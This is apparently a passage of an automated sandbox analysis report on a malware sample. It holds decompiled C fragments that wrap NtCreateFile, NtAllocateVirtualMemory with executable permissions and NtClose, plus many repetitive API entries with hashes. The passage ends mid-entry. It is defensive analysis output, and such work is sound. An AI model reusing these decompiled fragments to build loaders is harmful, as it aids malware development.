                                                        • Opcode Fuzzy Hash: 40796ed2abedf08632889fec39371184e398d1dfafb99c177ad60987c42a2680
                                                        • Instruction Fuzzy Hash: 700112B5E4020DB7DB10DAA5DC42FDEB7789B5430CF0041A5E908AB281F675EB548795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 283 41a2ca-41a321 call 41af20 NtCreateFile
                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,004090B3,?,004157A7,004090B3,FFFFFFFF,?,?,FFFFFFFF,004090B3,004157A7,?,004090B3,00000060,00000000,00000000), ref: 0041A31D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 56e90ec9e11605159a42278ee2eca9c803995f10a29f51cef008025b78b3b3ed
                                                        • Instruction ID: 4374f9253818ac73a4fe39cf2d80c1c6e60e079c2ea04d7cd97a0ea02a98d132
                                                        • Opcode Fuzzy Hash: 56e90ec9e11605159a42278ee2eca9c803995f10a29f51cef008025b78b3b3ed
                                                        • Instruction Fuzzy Hash: 7401A4B2201108AFCB48CF98DC85DEB37A9AF8C354F118259FA0DD7251D630E851CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 287 41a2d0-41a321 call 41af20 NtCreateFile
                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,004090B3,?,004157A7,004090B3,FFFFFFFF,?,?,FFFFFFFF,004090B3,004157A7,?,004090B3,00000060,00000000,00000000), ref: 0041A31D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                                        • Instruction ID: 9d1c7a99673d815193090eb3c7df6778cdc506c0404e130a1c4c2daf2453d359
                                                        • Opcode Fuzzy Hash: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                                        • Instruction Fuzzy Hash: B1F06DB6215208AFCB48DF89DC85EEB77ADAF8C754F118249BA0997241D630F8518BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 291 41a4aa-41a4ed call 41af20 NtAllocateVirtualMemory
                                                        C-Code - Quality: 79%
                                                        			E0041A4AA(void* __esi, intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
                                                        				long _t14;
                                                        
                                                        				_t10 = _a8;
                                                        				_push(0xec8b558a);
                                                        				_t3 = _t10 + 0xc7c; // 0x3c7c
                                                        				E0041AF20( *((intOrPtr*)(_a8 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a8 + 0x14)), 0, 0x30);
                                                        				_t14 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
                                                        				return _t14;
                                                        			}




                                                        0x0041a4b3
                                                        0x0041a4b9
                                                        0x0041a4bf
                                                        0x0041a4c7
                                                        0x0041a4e9
                                                        0x0041a4ed

                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B15D,?,0041B15D,?,00000000,?,00003000,00000040,004090B3,00000000), ref: 0041A4E9
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: b6012610b3534ab578e955300fa2c9147cf21ce4007fff8bd81e7b134cec30f3
                                                        • Instruction ID: e6a59205a01b9863badca04a1f4de8256db2c4ff87b2762c25fc6340aa599850
                                                        • Opcode Fuzzy Hash: b6012610b3534ab578e955300fa2c9147cf21ce4007fff8bd81e7b134cec30f3
                                                        • Instruction Fuzzy Hash: 35F0F8B6210114AFDB14DF99DC81EE777A9EF88354F11814AFE59A7241C630E811CBE4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 294 41a4b0-41a4c6 295 41a4cc-41a4ed NtAllocateVirtualMemory 294->295 296 41a4c7 call 41af20 294->296 296->295
                                                        C-Code - Quality: 100%
                                                        			E0041A4B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                        				long _t14;
                                                        
                                                        				_t3 = _a4 + 0xc7c; // 0x3c7c
                                                        				E0041AF20( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
                                                        				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                        				return _t14;
                                                        			}




                                                        0x0041a4bf
                                                        0x0041a4c7
                                                        0x0041a4e9
                                                        0x0041a4ed

                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B15D,?,0041B15D,?,00000000,?,00003000,00000040,004090B3,00000000), ref: 0041A4E9
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                                        • Instruction ID: 1a7d6a8cb6469f78efe4d9f6d69158b31777733b6dc10b35fa3ec10f3d4aa708
                                                        • Opcode Fuzzy Hash: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                                        • Instruction Fuzzy Hash: 67F015B2210208ABDB14DF89DC81EEB77ADAF8C754F018109BE0897241C630F811CBB4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E0041A400(intOrPtr _a4, void* _a8) {
                                                        				long _t8;
                                                        
                                                        				_t5 = _a4;
                                                        				_t2 = _t5 + 0x14; // 0x56c29f0f
                                                        				_t3 = _t5 + 0xc6c; // 0x409d1f
                                                        				E0041AF20( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
                                                        				_t8 = NtClose(_a8); // executed
                                                        				return _t8;
                                                        			}




                                                        0x0041a403
                                                        0x0041a406
                                                        0x0041a40f
                                                        0x0041a417
                                                        0x0041a425
                                                        0x0041a429

                                                        APIs
                                                        • NtClose.NTDLL(00415940,?,?,00415940,004090B3,FFFFFFFF), ref: 0041A425
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                                        • Instruction ID: 546cb3561d9e7aa21b5d5b03fb8e98cc08bf9eb549cb728b05757c44382c4f14
                                                        • Opcode Fuzzy Hash: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                                        • Instruction Fuzzy Hash: 87D01772200214ABD620EB99DC89ED77BADDF48664F018056BA485B242C530FA1086E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                        • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                        • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                        • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                        • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                        • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                        • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                        • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                        • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                        • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
